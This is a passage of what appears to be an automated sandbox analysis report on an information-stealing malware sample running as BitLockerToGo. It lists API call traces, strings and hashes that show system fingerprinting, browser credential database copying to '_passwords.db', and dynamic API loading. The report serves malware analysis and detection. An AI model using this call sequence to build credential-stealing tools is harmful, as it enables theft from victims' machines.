                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F366A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: VariantInit.OLEAUT32(?), ref: 008F36B9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E1375), ref: 008F28ED
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: RtlAllocateHeap.NTDLL(00000000), ref: 008F28F4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetComputerNameA.KERNEL32(00000000,008E1375), ref: 008F2908
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E13A9), ref: 008F28BB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: RtlAllocateHeap.NTDLL(00000000), ref: 008F28C2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetUserNameA.ADVAPI32(00000000,008E13A9), ref: 008F28D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 008F31D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: GetDeviceCaps.GDI32(00000000,00000008), ref: 008F31DC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 008F31E7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: ReleaseDC.USER32(00000000,00000000), ref: 008F31F2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,008F5DD5,?,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000,Computer Name: ,00917910,AV: ,00917904), ref: 008F31FE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 008F3205
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: wsprintfA.USER32 ref: 008F3217
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: GetKeyboardLayoutList.USER32(00000000,00000000,00917812,?,?), ref: 008F2A68
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: LocalAlloc.KERNEL32(00000040,00000000), ref: 008F2A76
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008F2A84
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 008F2AB3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: LocalFree.KERNEL32(00000000), ref: 008F2B5B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008F29A5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: RtlAllocateHeap.NTDLL(00000000), ref: 008F29AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: GetTimeZoneInformation.KERNEL32(?), ref: 008F29BB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: wsprintfA.USER32 ref: 008F29D9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C), ref: 008F2BC1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RtlAllocateHeap.NTDLL(00000000), ref: 008F2BC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ), ref: 008F2BE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RegQueryValueExA.KERNEL32(009178C8,00000000,00000000,00000000,000000FF,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000), ref: 008F2C02
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RegCloseKey.ADVAPI32(009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C,Keyboard Languages: ,00917950), ref: 008F2C0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C63: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 008F2CD9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C63: wsprintfA.USER32 ref: 008F2D37
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C16: GetSystemInfo.KERNEL32(?), ref: 008F2C30
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C16: wsprintfA.USER32 ref: 008F2C48
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00917950,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000,Computer Name: ,00917910,AV: ,00917904,Install Date: ), ref: 008F2D8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: RtlAllocateHeap.NTDLL(00000000), ref: 008F2D94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 008F2DB0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: wsprintfA.USER32 ref: 008F2DD6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2DEE: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 008F2E45
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00917817,?,?), ref: 008F3130
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: Process32First.KERNEL32(00000000,00000128), ref: 008F3140
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: Process32Next.KERNEL32(00000000,00000128), ref: 008F319E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: CloseHandle.KERNEL32(00000000), ref: 008F31A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00917816,00000000,?,?), ref: 008F2ECF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008F2F0C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: wsprintfA.USER32 ref: 008F2F39
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 008F2F58
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 008F2F8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: lstrlen.KERNEL32(?), ref: 008F2FA3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00917E28), ref: 008F3038
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegCloseKey.ADVAPI32(?), ref: 008F30A2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegCloseKey.ADVAPI32(?), ref: 008F30CE
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00917950,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000), ref: 008F62A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Allocate$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                                                                                    • String ID: 11.8$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

control_flow_graph
2083 8f9e25-8f9e35 call 8f9d79
2086 8f9e3b-8fa021 call 8e7c77 GetProcAddress * 20
2083->2086
2087 8fa026-8fa083 LoadLibraryA * 5
2083->2087
2086->2087
2089 8fa097-8fa09e
2087->2089
2090 8fa085-8fa092 GetProcAddress
2087->2090
2090->2089
2092 8fa0c9-8fa0d0
2089->2092
2093 8fa0a0-8fa0c4 GetProcAddress * 2
2089->2093
2093->2092
2094 8fa0e4-8fa0eb
2092->2094
2095 8fa0d2-8fa0df GetProcAddress
2092->2095
2095->2094
2096 8fa0ff-8fa106
2094->2096
2097 8fa0ed-8fa0fa GetProcAddress
2094->2097
2097->2096
2099 8fa108-8fa12c GetProcAddress * 2
2096->2099
2100 8fa131
2096->2100
2099->2100
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9E66
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9E7D
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9E94
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9EAB
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9EC2
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9ED9
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9EF0
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F07
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F1E
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F35
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F4C
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F63
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F7A
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F91
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FA8
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FBF
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FD6
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FED
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA004
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA01B
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA02C
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA03D
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA04E
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA05F
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA070
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75670000,008F9CA1), ref: 008FA08C
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75750000,008F9CA1), ref: 008FA0A7
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA0BE
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76BE0000,008F9CA1), ref: 008FA0D9
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(759D0000,008F9CA1), ref: 008FA0F4
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(773F0000,008F9CA1), ref: 008FA10F
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA126
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2238633743-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9aa4e1622d9410c7b3bcf8576897a08a76c793534da2bea71ab2b17f18943601
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9316da20e0ec3831845f2ec151a8f0fa210a6176e74b00a549039cccee8a71bc
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa4e1622d9410c7b3bcf8576897a08a76c793534da2bea71ab2b17f18943601
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E771F579801215FFDB3A9F64EE4AD653BA2FB183463004525EA55E3230EF365863EF11

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E981D
                                                                                                                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 008E9828
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 008E9837
                                                                                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008E989A
                                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 008E98B0
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008E98C7
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E98CE
                                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008E98E7
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008E98FF
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 008E990B
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E9912
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E9921
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0091833C), ref: 008E992D
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E9937
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,_passwords.db), ref: 008E9943
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,008EAE7A), ref: 008E997A
                                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 008E9981
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008E998C
                                                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 008E9993
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E999C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$Filelstrcat$Processlstrcpy$AllocateFree$CloseCopyCreateDeleteExistsHandlePathReadSizeSleepSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: _passwords.db
                                                                                                                                                                                                                                                                                                                    • API String ID: 3315713884-1485422284
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c4eb7071f34a0458cc66daec1910e400bd8a996518734eef12ad28e5de29069e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1e0cf33df8c18b05428cd65028ae2cbd20be891e81100c6e284c87ccc097abfd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4eb7071f34a0458cc66daec1910e400bd8a996518734eef12ad28e5de29069e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB614A32900148BBCB10BFB9EC4AEEE7B78FF05701F104524FA51E3262DA755A568B92

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8669
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: lstrlen.KERNEL32(?), ref: 008F8674
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: StrStrA.SHLWAPI(00000000,?), ref: 008F8689
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: lstrlen.KERNEL32(?), ref: 008F8698
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: lstrlen.KERNEL32(00000000), ref: 008F86B1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F87EF
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8848
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F88A8
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8901
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8917
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F892D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F893F
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 008F894E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F87E7
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F890F
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F88A0
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F8925
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F88F9
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F8840
                                                                                                                                                                                                                                                                                                                    • sqlo.dll, xrefs: 008F8A1C
                                                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 008F89FD
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F8937
                                                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 008F8A2E
                                                                                                                                                                                                                                                                                                                    • sqlite3.dll, xrefs: 008F89B7
                                                                                                                                                                                                                                                                                                                    • sqlite3.dll, xrefs: 008F89EB
                                                                                                                                                                                                                                                                                                                    • sqlo.dll, xrefs: 008F8A4D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Figure: control-flow graph for the function starting at 8e1656; blocks are marked Executed or Not Executed]
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 008E1686
                                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 008E16AC
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 008E16D6
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 008E16EE
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E16F5
                                                                                                                                                                                                                                                                                                                    • _time64.MSVCRT ref: 008E16FE
                                                                                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 008E1705
                                                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 008E170E
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E171E
                                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 008E1736
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E1753
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008E1761
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 008E177D
                                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 008E1799
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E17AE
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E17B8
                                                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 008E17BF
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008E17CB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                                                                                                                    • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d7931a1f788848d2f8455e4ea23b4af0a1ce5dc9e0a906f8582238d23ae89bc6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d190cdd3be4f5ff70cbeaa6fc68824d7de0e2207af07e8abed482e37cc5f8dd1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7931a1f788848d2f8455e4ea23b4af0a1ce5dc9e0a906f8582238d23ae89bc6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C41A1B1E14258BBDB209B72EC4DFEB7B7DEB8D710F004599F20AD10A1DA314A90DE60
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
